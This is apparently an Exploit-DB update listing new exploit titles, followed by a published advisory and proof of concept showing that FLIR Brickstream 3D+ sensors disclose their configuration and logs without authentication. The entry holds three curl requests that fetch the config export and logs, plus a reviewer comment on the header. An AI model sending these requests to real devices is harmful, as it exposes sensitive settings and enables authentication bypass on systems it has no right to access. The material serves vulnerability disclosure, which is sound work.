
22 changes to exploits/shellcodes

Snes9K 0.0.9z - Buffer Overflow (SEH)
NoMachine < 5.3.27 - Remote Code Execution
MaxOn ERP Software 8.x-9.x - 'nomor' SQL Injection
FLIR Brickstream 3D+ - RTSP Stream Disclosure
FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure
CAMALEON CMS 2.4 - Cross-Site Scripting
Academic Timetable Final Build 7.0a-7.0b - 'id' SQL Injection
FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure
FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)
AlchemyCMS 4.1 - Cross-Site Scripting
FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution
College Notes Management System 1.0 - 'user' SQL Injection
Advanced HRM 1.6 - Remote Code Execution
Centos Web Panel 0.9.8.480 - Multiple Vulnerabilities
Academic Timetable Final Build 7.0 - Information Disclosure
KORA 2.7.0 - 'cid' SQL Injection
# Exploit Title: FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure
# Author: Gjoko 'LiquidWorm' Krstic
# Date: 2018-10-14
# Vendor: FLIR Systems, Inc.
# Product web page: http://www.brickstream.com
# Affected version: Firmware: 2.1.742.1842, Api: 1.0.0, Node: 0.10.33, Onvif: 0.1.1.47
# Tested on: Titan, Api/1.0.0
# References:
# ZSL-2018-5495
# https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5495.php
# Desc: The FLIR Brickstream 3D+ sensor is vulnerable to unauthenticated config
# download and file disclosure vulnerability when calling the ExportConfig REST
# API (getConfigExportFile.cgi). This will enable the attacker to disclose sensitive
# information and help her in authentication bypass, privilege escalation and/or
# full system access.
$ curl http://192.168.2.1:8083/getConfigExportFile.cgi
$ curl http://192.168.2.1:8083/restapi/system/ExportConfig
$ curl http://192.168.2.1:8083/restapi/system/ExportLogs |
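
Review bot: the `# Desc:` block names only the ExportConfig REST API and getConfigExportFile.cgi, but the third request goes to `/restapi/system/ExportLogs`, which the header never mentions. Say in the description that the log export endpoint is covered too, so the title and text account for all three requests. The header also gives no fixed firmware version or vendor status next to `# Affected version:`, so a reader cannot tell from this file which builds to upgrade to; add that line, or state that no fix was available as of the `# Date:`.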